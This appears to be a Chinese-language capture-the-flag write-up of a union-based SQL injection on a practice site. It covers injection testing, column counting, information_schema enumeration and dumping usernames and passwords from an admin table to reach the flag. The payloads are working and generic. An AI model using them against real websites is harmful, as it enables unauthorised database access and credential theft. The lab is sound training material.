1.得到站点目标
2.打开已给网站并查找注入点
3.进行测试
and 1 = 1 # 页面显示正常 and 1 = 2 # 页面显示异常
4.查询字段数
?id=1 order by 3 # 页面显示异常 ?id=1 order by 2 # 页面显示正常
5.查看返回值
?id=4 union select 1,2#
6.常见信息查询
?id=4 union select 1,database()# maoshe ?id=4 union select 1,user()# maoshe@localhost ?id=4 union select 1,version()# 5.5.53 存在information_schema数据库
7.查看数据库下的表
?id=4 union select 1,group_concat(table_name) from information_schema.tables where table_schema='maoshe'# 关键信息 admin表
8.查看表下的列名
?id=4 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'#
9.查看列下的具体数据
?id=4 union select 1,group_concat(id,username,password) from admin #
10.得到目标flag
hellohack
11.总结
(1)先测试是否存在注入点 (2)再查看返回点 (3)从数据库到表到列名最后到具体数据,一步一步